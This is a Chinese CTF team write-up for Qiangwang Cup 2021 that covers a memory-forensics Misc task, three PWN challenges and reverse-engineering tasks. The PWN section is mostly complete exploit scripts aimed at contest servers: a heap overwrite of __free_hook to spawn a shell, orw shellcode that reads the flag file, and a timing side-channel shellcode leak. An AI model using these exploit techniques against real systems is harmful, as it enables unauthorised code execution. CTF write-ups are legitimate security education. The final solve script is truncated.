强网杯 2021 WriteUp - CNSS

Misc

签到

flag{welcome_to_qwb_s5}

问卷题

填问卷

CipherMan

memory 文件为 win7 内存镜像

扫一下文件可以找到 BitLocker 的恢复密钥

用 bdemount 和恢复密钥挂载 Secret 有一个 NTFS 分区

挂载分区找到 README.txt 文件内容即为 flag

PWN

baby_diary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
from pwn import *
from easypwn import *
import os
import sys
context.terminal=['tmux','splitw','-h']
context.log_level='DEBUG'
context.arch='amd64'
sys.path[0]
os.chdir(sys.path[0])
rn = lambda n : p.recv(n)
rc = lambda : pA.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)
r=run('./pp','231','092')
p=remote("8.140.114.72",1399)
def add(ind,size,ss=b''):
sla('>>','1')
sla('size',str(size))
if(size!=len(ss)):
ss+=b'\n'
sa('content',ss)
def dele(ind):
sla('>>','3')
sla('index',str(ind))

def show(ind):
sla('>>','2')
sla('index',str(ind))
# byte(p+size+1)==2*n+bytesum(p)
raw='''
0x1716
0x187c
0x17D7
set $addlist=(unsigned long*)$rebase(0x4060)
set $sizelist=(unsigned long*)$rebase(0x4140)
''' #add dele
for i in range(7):
add(i,0x27)
add(7,0x107)
add(8,0x507)
add(9,0x4f7)
add(10,0x457)
add(11,0x27)
dele(8)
add(8,0x27,ropx(0x55,0x500))
add(12,0x27)
add(13,0x477,ropx(0))
add(14,0x27)
add(15,0x47)
dele(10)
add(10,0x27)
for i in range(7):
dele(i)
dele(12)
dele(10)
add(0,0x457,ropx(0x5))
for i in range(7):
add(i,0x27)
add(12,0x27)
for i in range(1,7):
dele(i)
dele(11)
dele(12)
dele(8)
for i in range(7):
add(i,0x27)
add(11,0x27)
dele(14)
add(12,0x27,ropx([0x27]))
dele(12)
add(12,0x27,ropx(0x5,[0x18]))
dele(9)
add(9,0x47)
show(13)
ru('content: ')
r.libc_base=u64(rn(6).ljust(8,b'\x00'))-r.symbol['main_arena']-96
dele(15)
dele(9)
dele(11)
add(9,0x27,ropx([0x10],r.symbols('__free_hook')))
add(11,0x47,ropx('/bin/sh\x00'))
add(15,0x47,ropx(r.symbols('system')))
# r.bp(raw=raw)
dele(11)
p.interactive()

[强网先锋]orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import *
from easypwn import *
import os
import sys
context.terminal=['tmux','splitw','-h']
context.log_level='DEBUG'
context.arch='amd64'
sys.path[0]
os.chdir(sys.path[0])
rn = lambda n : p.recv(n)
rc = lambda : p.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)

r=run('./p1','223','0112')
p=r.p
# # -1-1 0-8
def add(ind,ss):
sla('>>','1')
sla('index',str(ind))
size=len(ss)
sla('size',str(size))
sa('con',ss)
def dele(ind):
sla('>>','4')
sla('index',str(ind))
def q():
sla('>>','5')
raw='''
set $a=(unsigned long*)$rebase(0x2020A0)
0xEC7
0xFE7
0x10A5
'''
p=remote("39.105.131.68",12354)
sh='''
push rsp
pop rsi
push rdi
pop rax
push rdi
pop rdx
jmp .+0x1a
'''
# r.bp(raw=raw)
add(-13,asm(sh).ljust(8,b'\x90'))
sh='''
mov dl,0xff
syscall
call rsp
'''
add(0,asm(sh).ljust(8,b'\x90'))
q()
sh='''
xor rax,rax
push rax
push rax
inc rax
inc rax
pop rsi
pop rdx
mov r9,{}
push r9
push rsp
pop rdi
syscall
xchg rax,rdi
xor rax,rax
mov rsi,rbp
add rsi,0x200
xchg r11,rdx
syscall
xor rax,rax
push rax
pop rdi
inc rdi
inc rax
syscall
'''.format(str2hex("flag\x00"))
sd(asm(sh))
p.interactive()

[强网先锋]shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
from pwn import *
from easypwn import *
import os
import sys
import datetime
context.terminal=['tmux','splitw','-h']
# context.log_level='DEBUG'
context.arch='amd64'
context.bits=64
sys.path[0]
os.chdir(sys.path[0])
rn = lambda n : p.recv(n)
rc = lambda : p.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)

off=0
# jmp $+4
# jmp $+7
# call $-2

s1='''
push 9
pop rax
xor rdi,rdi
mov rsi,rdi
inc rdi
shl rdi,16
inc rsi
shl rsi,12
push 7
pop rdx
push 0x22
pop rcx
xor r8,r8
xor r9,r9
dec r8
syscall
mov rsi,rax
xor rax,rax
push rax
push rax
pop rdi
pop rdx
inc rdx
shl rdx,11
add rsi,rdx
syscall
mov rsp,rsi
push 0x23
push rsi
retfq
'''
s2='''
push 0
push 0x67616c66
mov ebx,esp
xor ecx,ecx
push 5
pop eax
int 0x80
push 0x33
push 0x10818
retf
'''

var=0x66
sss=[]

while True:
for var in range(0x20,0x7f):
s3='''
push 3
pop rdi
xor rax,rax
mov rsi,rax
inc rsi
shl rsi,16
push 0xff
pop rdx
syscall
mov bl,%d
xor rdi,rdi
xor eax,eax
cmp bl,byte ptr [rsi+%d]
jne $+7
mov eax,231
syscall
'''%(var,off)
logx(chr(var))
# r=run('./pp','223')
p=remote('39.105.137.118',50050)
# p=r.p
ss1=asm(s1,arch='amd64',bits=64)
ss2=asm(s2,arch='i386',bits=32)
ss3=asm(s3,arch='amd64',bits=64)
open('in','wb').write(ss1)
os.system('python2 alpha3/ALPHA3.py x64 ascii mixedcase RBX --input="in" > out')
res=open('out','r').read()
# r.bp(0x40026D)
sd(res)
sleep(0.1)
sd(ss2+ss3)
starttime = datetime.datetime.now()
p.recvrepeat(timeout=0.1)
endtime = datetime.datetime.now()
if ((endtime - starttime).microseconds)<=40000:
off+=1
sss.append(var)
break
if var==0x7d:
break

# # 0x400000
print(''.join([chr(i) for i in sss]))

Re

ezmath

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
if ( strlen(s) == 38 )
{
for ( i = 0; i <= 37; i += 2 )
{
if ( dbl_4020[i / 2] != sub_13F3(*(unsigned __int16 *)&s[i]) )
goto LABEL_2;
}
puts("correct");
result = 0LL;
}
double __fastcall sub_13F3(int a1)
{
int i; // [rsp+8h] [rbp-Ch]
double v3; // [rsp+Ch] [rbp-8h]

v3 = 0.2021;
for ( i = 8225; i < a1; ++i )
v3 = 2.718281828459045 - (double)i * v3;
return v3;
}

s 为输入

1
*(unsigned __int16 *)&s[i]) 这是取了两位char为一个int,我们可以把他当成一个int
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <iostream>
#include <cstdio>
long double dbl_4020[19] =
{
0.00009794904266317233,
0.00010270456917442,
0.00009194256152777895,
0.0001090322021913372,
0.0001112636336217534,
0.0001007442677411854,
0.0001112636336217534,
0.0001047063607908828,
0.0001112818534005219,
0.0001046861985862495,
0.0001112818534005219,
0.000108992856167966,
0.0001112636336217534,
0.0001090234561758122,
0.0001113183108652088,
0.0001006882924839248,
0.0001112590796092291,
0.0001089841164633298,
0.00008468431512187874
};
long double b[1000000];
void dabiao(int a1)
{
int i; // [rsp+8h] [rbp-Ch]
long double v3; // [rsp+Ch] [rbp-8h]

v3 = 0.0004829108052495089;
// printf("%llf\\n",v3);
for ( i = 8225; i < a1; ++i )
v3 = 2.718281828459045 - (long double)i * v3;
b[a1] = v3;
}
int main()
{
printf("OK\\n");
for(int i = 0;i <= 8225;i++)
b[i] = 0.0004829108052495089;
for(int i = 8225;i < 1000000;i++)
dabiao(i);
printf("OK\\n");
int j = 0;
while(j < 19)
{
for(int i = 0;i < 1000000;i++)
{
if(b[i] == dbl_4020[j])
{
printf("0x%h",i);
j++;
break;
}
}
}
return 0;
}

这里有smc(应该),它好像path了那个v3,我在看

1
2
3
4
5
6
7
8
9
10
11
12
__int64 sub_1391()
{
__int64 result; // rax

mprotect((void *)((unsigned __int64)(&qword_2018 - 1) & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);
result = ((double (__fastcall *)(__int64 (__fastcall *)(), double, double))((char *)&unk_11C8 + 1))(
sub_1301,
0.0,
1.0);
*(&qword_2018 - 1) = result;
return result;
}

nop edx是啥

混淆的,可以path掉push rbx和nop edx,就正常了

image.png

真正的v3,它好像无反调试,我tm直接动态看结果

1
2
3
4
v3 = 0.0004829108052495089;
for ( i = 8225; i < a1; ++i )
v3 = 2.718281828459045 - (double)i * v3;
return v3;

说起来 2.718281828459045 是不是 e 啊

打表写不了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import binascii
table=[
0.00009794904266317233,
0.00010270456917442,
0.00009194256152777895,
0.0001090322021913372,
0.0001112636336217534,
0.0001007442677411854,
0.0001112636336217534,
0.0001047063607908828,
0.0001112818534005219,
0.0001046861985862495,
0.0001112818534005219,
0.000108992856167966,
0.0001112636336217534,
0.0001090234561758122,
0.0001113183108652088,
0.0001006882924839248,
0.0001112590796092291,
0.0001089841164633298,
0.00008468431512187874
]

for i in table:
s=hex(int(2.718281828459045/i))
print(s,end=',')
1
2
3
4
5
6
7
#include <cstdio>
unsigned short s_[]={0x6c67,0x6762,0x737c,0x6162,0x5f6e,0x6965,0x5f6e,0x6568,0x5f6a,0x656d,0x5f6a,0x616b,0x5f6e,0x6164,0x5f62,0x6974,0x5f6f,0x616d,0x7d62,0};
int main(){
char *s=(char *)s_;
for (int i=0;i<38;i++) if (i%2==0) s[i]--;
printf("%s",s);
}

unicorn_like_a_pro

  • 用于恢复 binary

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    block_table = [0x02F73020, 0x00000015, 0x09D3473A, 0x00000051, 0x0EF87B55, 0x0000000D, 0x147CB028, 0x00000023, 0x15F833AA, 0x00000030, 0x17086780, 0x00000018, 0x1733A9D4, 0x00000014, 0x17D61EE8, 0x00000051, 0x1D52F19E, 0x00000011, 0x1F732DE0, 0x0000000D, 0x1FBECFAD, 0x0000001B, 0x245BD7C8, 0x00000055, 0x25E7ABEE, 0x00000009, 0x2882C190, 0x000000A2, 0x2A2084A0, 0x00000075, 0x326AA6AE, 0x00000036, 0x33074A36, 0x00000024, 0x3440BD69, 0x0000002C, 0x362A1FC3, 0x0000002C, 0x3C0450D0, 0x0000000D, 0x3CB575FD, 0x00000011, 0x41B3B26E, 0x0000004E, 0x46005120, 0x00000011, 0x465A72CF, 0x00000002, 0x492145A0, 0x0000000D, 0x49AA4CE0, 0x0000002D, 0x4BD63647, 0x0000004E, 0x4BF84A87, 0x0000000D, 0x4D102445, 0x00000033, 0x4D4D3C55, 0x0000001B, 0x53723232, 0x0000000A, 0x5809B5CB, 0x000000A2, 0x5B12FFCE, 0x00000015, 0x5B1F3000, 0x00000051, 0x5D9FBD20, 0x00000027, 0x6219EED9, 0x0000008A, 0x65D82D17, 0x0000004C, 0x67F5671A, 0x00000063, 0x6CE2CBC1, 0x00000033, 0x718A739C, 0x0000000B, 0x71A62DD7, 0x00000015, 0x7693A1F6, 0x00000014, 0x7A473FB0, 0x00000047, 0x7AEFEDDC, 0x00000011, 0x7AF2CF90, 0x0000004F, 0x7BE0B8B0, 0x0000001B, 0x80EB3E88, 0x0000000A, 0x8213506A, 0x0000000C, 0x82468114, 0x00000011, 0x86B872A2, 0x0000001C, 0x87FBD296, 0x00000019, 0x88719339, 0x00000016, 0x89E2630A, 0x00000024, 0x8CB6536E, 0x0000004E, 0x92316E00, 0x00000015, 0x9415A51E, 0x0000004F, 0x94D658E0, 0x0000002B, 0x97E8DFCD, 0x00000036, 0x992E3874, 0x0000002A, 0x9B06958D, 0x00000030, 0x9B36B480, 0x0000000D, 0xA03CEFAD, 0x0000005A, 0xA39F47E6, 0x0000004E, 0xA946DEC4, 0x000000B4, 0xAE6173DC, 0x00000051, 0xB044A68D, 0x0000008C, 0xB29E36A8, 0x0000000B, 0xB82781F4, 0x0000000D, 0xC14DFAF8, 0x00000011, 0xC3F42E20, 0x0000001E, 0xC5E0065E, 0x00000067, 0xCAD68B21, 0x00000039, 0xCBF29AC7, 0x00000011, 0xCE8729BC, 0x0000001B, 0xD2A85A94, 0x00000004, 0xD34FA4F3, 0x00000011, 0xD64611B0, 0x00000058, 0xD814FD56, 0x00000018, 0xDD386A80, 0x0000000A, 0xDE82DFAC, 0x00000011, 0xEC68D16F, 0x0000001B, 0xEEDE845B, 0x0000003F, 0xF235F260, 0x0000008D, 0xF9AA1F0B, 0x00000087, 0xFC200887, 0x00000011, 0xFED657A3, 0x0000000C, 0x00000000, 0x00000000, 0x00000000, 0x00000000]

    jmp_table = [0x00412F5E, 0xFFFFFA22, 0x14252652, 0xFFFFF9AC, 0x66CEF8EC, 0x0251D934, 0x0000009F, 0xC56FBF59, 0xFFFFFF61, 0xAA4D5B7C, 0x02745896, 0xFFFFFB7F, 0x34B6D31E, 0xFFFFFBB0, 0x302CC828, 0x02AC5992, 0xFFFFF524, 0x67CC4064, 0xFFFFF483, 0x8A5D9B26, 0x046254D0, 0xFFFFFC37, 0x074AB936, 0xFFFFFC7F, 0xB8EA37F7, 0x0CACD9FE, 0x0000007F, 0x6112F222, 0x00000002, 0x47A72561, 0x0F0FE6EB, 0xFFFFFBAE, 0x0A1411E7, 0xFFFFFC85, 0x3BE88B46, 0x0FC59DC2, 0xFFFFF72F, 0x7D12A5EF, 0xFFFFF691, 0xE67393D6, 0x10B1EBCA, 0x000001CF, 0x473A1295, 0x0000022E, 0x7BC15385, 0x1565D41D, 0xFFFFFDC4, 0x05D337BE, 0xFFFFFE7E, 0xE12982E4, 0x18909E40, 0x000005EB, 0xAE2337AF, 0x000005B1, 0x8E0AB2ED, 0x1AE7593A, 0xFFFFF3BC, 0x23E9058D, 0xFFFFF40B, 0xDFA6CF3E, 0x1B47DA81, 0xFFFFF8C3, 0x349CC616, 0xFFFFF7E9, 0x70C290D0, 0x1D816435, 0x00000002, 0x43F999C9, 0xFFFFFFD8, 0xAB0BCA16, 0x1DACC905, 0xFFFFFF54, 0x5C129962, 0xFFFFFD06, 0xE4515A41, 0x1E03B13C, 0xFFFFFF80, 0x7E763806, 0xFFFFF36A, 0xA25F3D93, 0x22FEFC06, 0xFFFFFCDD, 0xB94E0C2F, 0xFFFFFCB6, 0xF023033D, 0x26B1E690, 0xFFFFFDAB, 0xD0C7ED0C, 0xFFFFFE9B, 0xD49872C6, 0x2A652084, 0x000001EA, 0xDF9B65EE, 0x00000051, 0x5CC5AB90, 0x2FBEBD25, 0x0000048F, 0x60A4E9F2, 0x000009AF, 0x42FE8B0D, 0x34F12D90, 0x000004C0, 0xF6257D94, 0x00000480, 0x5227DE21, 0x35F591D0, 0xFFFFFCA1, 0xDA83E113, 0xFFFFF998, 0x805C7ECB, 0x37EB0B72, 0xFFFFF3EC, 0x7480201A, 0xFFFFF903, 0xAC977E11, 0x389A58A8, 0x00000189, 0xE4005CD7, 0xFFFFFDEC, 0xB043695F, 0x3CB24155, 0x0000084C, 0x8ACB6FF1, 0x00000899, 0xACB471A5, 0x3DCBCDE3, 0x000007A8, 0xA84E3072, 0x00000384, 0xB2624259, 0x3F5290DE, 0xFFFFFE25, 0x8AC11F92, 0xFFFFFD8A, 0x44ACCD78, 0x47FF9B7E, 0x00000A81, 0x9833BF9C, 0x00000B35, 0x9B7199CD, 0x4C7867E6, 0x0000011C, 0x68BB4F80, 0x0000002E, 0x75B675CD, 0x53ADCD80, 0x000004E8, 0x6AA4F705, 0x00000452, 0xBA7C314B, 0x566E1640, 0x00000C8E, 0x203E3737, 0x00000C38, 0xF9367ED9, 0x5EDBB130, 0x000004FF, 0xD4F71A40, 0x000002AA, 0x35DC4141, 0x6C29C83A, 0x00000013, 0xBEAD8A76, 0xFFFFFFB5, 0x7A8A43EF, 0x6E036C9C, 0x00000BD5, 0x225F81E0, 0x00000D89, 0x3C25944D, 0x6FDCCE50, 0x00000605, 0xD3126740, 0x000003D5, 0xA3DA544C, 0x7132D345, 0x0000064E, 0x00915A5A, 0x000006DD, 0x5BCB6B22, 0x720DBD5C, 0x000008C3, 0x64DCFDF6, 0x00000858, 0x190B20BB, 0x7A035AD4, 0x00000424, 0x4DD955FB, 0x000004BF, 0xF65150B5, 0x7CBAED22, 0x00000AA1, 0x62CC154B, 0xFFFFFC58, 0x8DD5CEDB, 0x7EBF8EA8, 0x00000458, 0xCE844A0E, 0xFFFFF734, 0x9079D6BA, 0x804885CD, 0x000007BB, 0x89A8DA66, 0x00000136, 0x7185B813, 0x82190F37, 0xFFFFF58C, 0x013FA7D4, 0xFFFFF4AB, 0x7518093D, 0x83F7826A, 0x00000917, 0x2F33C3DD, 0xFFFFFBF0, 0x02A289B1, 0x8481BFD5, 0xFFFFF927, 0x72EED2D1, 0xFFFFF80A, 0xF46FD351, 0x85A69D6E, 0x000000B4, 0x27A3BB0F, 0x00000181, 0x49235BC0, 0x85F73150, 0x00000259, 0xA300692F, 0x000009BD, 0x5A3E46A9, 0x86E2497A, 0xFFFFFB53, 0xE7614707, 0xFFFFFBB3, 0xFA190B2A, 0x8B261F60, 0xFFFFF323, 0x97B9CC33, 0xFFFFFAB7, 0x2CB73BF0, 0x8B42B00C, 0x00000871, 0xA57A2DE3, 0x00000797, 0xA73082D6, 0x8E4C5C94, 0x000000FE, 0xEE4B594B, 0xFFFFF999, 0xDCE3B74D, 0x913A9FDB, 0xFFFFFE1C, 0x1BFFA329, 0xFFFFFD31, 0x49B21C95, 0x922BFB96, 0xFFFFF61B, 0x4FAFD829, 0xFFFFFBBA, 0x6BD5D317, 0x9F4B8702, 0xFFFFFEC1, 0xB691AD49, 0xFFFFFEF2, 0xCE6C6FE9, 0xA2CEAAA6, 0xFFFFFD89, 0x60E52701, 0xFFFFFCB2, 0x25AD9A9D, 0xAA970D72, 0xFFFFF2BB, 0xC1F58CAC, 0xFFFFF2AB, 0x20B8FE22, 0xABC02B72, 0xFFFFF94B, 0xFF6EA5A6, 0xFFFFFA6A, 0x1CD46647, 0xAE535E9E, 0x000003EC, 0x31246F6B, 0x0000035B, 0x50E2A20A, 0xB7337941, 0xFFFFF856, 0xD1A79AD7, 0xFFFFF955, 0x14673B75, 0xBB8DB95E, 0xFFFFFEEB, 0x6A7F1E5A, 0xFFFFF3B3, 0x1EF2F3AA, 0xBC1EDA22, 0xFFFFFB90, 0xE247955F, 0xFFFFFCE6, 0xA0351A85, 0xBCD91FE8, 0x0000008C, 0x71A348B9, 0x00000030, 0x821754EF, 0xBD38E305, 0xFFFFFF59, 0xE694333F, 0xFFFFFEF9, 0x436B1A45, 0xBE1AA65A, 0xFFFFF93D, 0x8761A810, 0xFFFFFEEB, 0xB2DB19FA, 0xC052453C, 0x000009B5, 0xB05027D7, 0x000009C5, 0xBCA91679, 0xC4A2D780, 0x000008B9, 0xE42FD068, 0x000007C1, 0x9F8B2B83, 0xC6A236BA, 0xFFFFFDBB, 0x20649A12, 0xFFFFFD09, 0x5F73FD94, 0xC6BB5160, 0xFFFFFE90, 0x0ED42674, 0xFFFFFF4B, 0xA76699CC, 0xCB74E940, 0x000003E3, 0x7DA194FF, 0xFFFFFCDA, 0xB23E5B15, 0xD027B387, 0xFFFFF701, 0x880BCC4F, 0xFFFFF785, 0xFEA3D685, 0xD1127D6B, 0xFFFFFAC0, 0xDF3D499A, 0x00000362, 0x84B7777D, 0xD6F5F913, 0xFFFFFCCD, 0xA5D89DB8, 0xFFFFFCAB, 0xF69BAE29, 0xDD04F828, 0xFFFFF705, 0xE18F3BA0, 0xFFFFF64D, 0xEBC799B0, 0xDDF22CB8, 0x0000075D, 0x47F7B857, 0x000001B3, 0x5C1CDEA9, 0xDF34D0A8, 0x0000014D, 0xBFE2CAD5, 0x00000201, 0x1F0C8A89, 0xE146EA40, 0x0000046D, 0x189EB8F9, 0xFFFFF6FB, 0x4CA1090D, 0xE231C560, 0x00000710, 0x2E586529, 0xFFFFFF17, 0x0E9AA776, 0xE2FC6838, 0x00000733, 0xB73DDD7A, 0x00000753, 0x14A1BDE4, 0xE44AE35D, 0x000002C8, 0x46B1F3D1, 0xFFFFFA2D, 0xD2295816, 0xE5AF4AB1, 0x00000DB0, 0x0AFF4FF9, 0x00000D91, 0xB17A4340, 0xE7E3CF21, 0x00000656, 0x9FC50924, 0x00000658, 0x31615022, 0xE8815965, 0x00000BCB, 0x6F51A655, 0x00000C0A, 0x72F5680C, 0xEBDF0F14, 0xFFFFF2B1, 0xD36EC5D4, 0xFFFFF239, 0x3B711343, 0xEC12E59B, 0x00000270, 0x3A38D2E8, 0x0000023D, 0x68D07674, 0xF4013920, 0x00000703, 0xD83CCFAA, 0x000007BA, 0x46891EEB, 0xF6847EC1, 0xFFFFFE62, 0x6D4BAAFC, 0xFFFFFD92, 0x5E6F5A94, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]

    class Block:
    addr = 0
    size = 0
    left = 0
    right = 0
    code = b""

    def __init__(self, addr, size, left, right, code = b"") -> None:
    self.addr = addr
    self.size = size
    self.left = left
    self.right = right
    self.code = code

    DWORD = lambda x:x&0xFFFFFFFF
    alg = lambda x,y:x^y^DWORD(x*y)^DWORD(x+y)

    def recover(addr, data):
    if addr in addr_list:
    return
    if addr == 0x10a3:
    block_list.append(Block(addr, 0, 0x1eec, 0x1eec, b""))
    recover(0x1eec, DWORD(data+0xD4F64670))
    return
    addr_list.append(addr)
    token = alg(data, addr)
    size = -1
    for i in range(0x55):
    if block_table[2*i] == token:
    size = block_table[2*i+1]
    break
    if size == -1:
    # raise AssertionError()
    return

    tail = addr + size - 2
    token = alg(data, tail)

    for i in range(0x55):
    if jmp_table[5*i] == token:
    left = jmp_table[5*i+1]
    right = jmp_table[5*i+3]
    recover(DWORD(tail+left), DWORD(data+jmp_table[5*i+2]))
    recover(DWORD(tail+right), DWORD(data+jmp_table[5*i+4]))

    code_block = code[addr-0x1000: addr-0x1000+size-2]
    xor_data = list(data.to_bytes(4, "little"))
    code_block = list(code_block)
    for i in range(size-2):
    code_block[i] ^= xor_data[i%4]
    code_block = bytes(code_block)
    block_list.append(Block(addr, size-2, DWORD(tail+left), DWORD(tail+right), code_block))
    break

    with open("origin_code", "rb") as f:
    code = f.read()

    addr_list = []
    block_list = []
    recover(0x1000, 0x3265B1F5)
    block_list.sort(key=lambda x:x.addr)
    addr_list.sort()

    def get_block_idx(addr):
    for i in range(len(block_list)):
    if addr == block_list[i].addr:
    return i
    paddr = 0x1000
    with open("recover_code22", "wb") as f:
    for i, b in enumerate(block_list):
    if paddr == 0x15ab:
    print("HERE: %s" % hex(b.addr))
    f.write(b.code)
    j = get_block_idx(b.left)
    if not j:
    left = 0
    elif i >= j:
    left = len(b.code) + 6
    for ii in range(j, i):
    left += len(block_list[ii].code)+12
    left = -left
    else:
    left = 6
    for ii in range(i+1, j):
    left += len(block_list[ii].code)+12

    jmp_flag = 0
    k = get_block_idx(b.right)
    if not k:
    right = 0
    elif i >= k:
    right = len(b.code) + 12
    for ii in range(k, i):
    right += len(block_list[ii].code)+12
    right = -right
    else:
    right = 0
    jmp_flag = 1
    for ii in range(i+1, k):
    right += len(block_list[ii].code)+12

    if left == 0 and right != 0:
    left = right + 6
    elif left != 0 and right == 0 and jmp_flag == 0:
    right = left - 6
    elif left == 0 and right == 0:
    left = 5000
    right = 5000
    print("\\nERROR")
    print(hex(b.addr), end="")

    f.write(b"\\x0f\\x85") # jz
    f.write((DWORD(left )).to_bytes(4, "little"))
    f.write(b"\\x0f\\x84") # jnz
    f.write((DWORD(right)).to_bytes(4, "little"))
    paddr += len(b.code)+12

    def done():
    while(1):
    try:
    addr = int(input(), base=16)
    except:
    continue
    for b in block_list:
    if addr >= b.addr and addr < b.addr + b.size + 12:
    print("Jz :0x%x" % b.left)
    print("Jnz :0x%x" % b.right)
    break
  • 爆破 time(0)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    #include "ida.h"
    #include "stdio.h"
    #include "stdlib.h"
    #include "time.h"

    size_t now = 0x60c5c238;
    size_t range = 0xF0C0*2;
    size_t xx;
    void set_number(size_t n)
    {
    xx = n;
    }
    size_t get_number()
    {
    size_t t = xx;
    xx = 0x756E69636F726E03 * xx + 0xBADC0DEC001CAFE;
    return xx;
    }

    int test(size_t n)
    {
    size_t i, t1, t1_1, t2, t2_1, x;
    x = n;
    set_number(0x7177625F32303231);
    for (i = 0; i != 256; ++i)
    {
    t1 = get_number();
    t1_1 = t1;
    t2 = get_number(); // readfsqword
    t2_1 = t2;
    x = __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13); // __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13);
    if ((i & 1) != 0)
    x = t2_1 ^ (t1_1 + x);
    if ((i & 2) != 0)
    x ^= t1_1 + t2_1;
    if ((i & 4) != 0)
    x ^= t2_1 ^ t1_1;
    if ((i & 8) != 0)
    x += t1_1 + t2_1;
    }
    printf("0x%llx", x);
    if (x == 0x1C986C3B22EA63E5){
    printf("\\nYES\\n");
    printf("0x%llx", n);
    exit(0);
    }
    return 0;
    }

    int test2()
    {
    size_t i, j, t1, t1_1, t2, t2_1, x;
    size_t v39, v0;
    printf("[");
    set_number(0x5249415452455451);
    for (j = 0; j != 32; j++){
    v39 = get_number();
    v0 = v39;
    x = j;
    for (i = 0; i != 256; ++i)
    {
    t1 = get_number();
    t1_1 = t1;
    t2 = get_number(); // readfsqword
    t2_1 = t2;
    x = __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13); // __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13);
    if ((i & 1) != 0)
    x = t2_1 ^ (t1_1 + x);
    if ((i & 2) != 0)
    x ^= t1_1 + t2_1;
    if ((i & 4) != 0)
    x ^= t2_1 ^ t1_1;
    if ((i & 8) != 0)
    x += t1_1 + t2_1;
    }
    printf("%u,", (v0 + x)&0xFF);
    }
    printf("]");
    return 0;
    }

    int main()
    {
    test2();
    return 0;
    //test(0x0000000060C58B03/0xe10);
    for (size_t i = (now-range)/0xe10; i < now/0xe10; i++)
    {
    float p = (float)(i-(float)(now-range)/0xe10)/(float)(range/0xe10);
    printf("\\r%llx\\t%f", i, p);
    if (test(i))
    {
    printf("YES %llx", i);
    exit(0);
    }
    }
    printf("FAILED\\n");
    }
  • 爆破 crc32

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    #include <stdio.h>
    #include <stdint.h>
    #include <x86intrin.h>

    size_t data[8] = {299650393, 691998794, 68510124, 1960587641, 1360326369, 875761003, 4117139363, 485610796};
    int main(int argc, char *argv[]) {
    for (int j=0; j<8; j++){
    for (unsigned int i = 0; i <= 0xffffffff; i++) {
    unsigned int res = _mm_crc32_u32(0, i);
    if (res == data[j]) {
    printf("0x%08x,", i);
    break;
    }
    }
    }
    return 0;
    }
  • solve 脚本

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
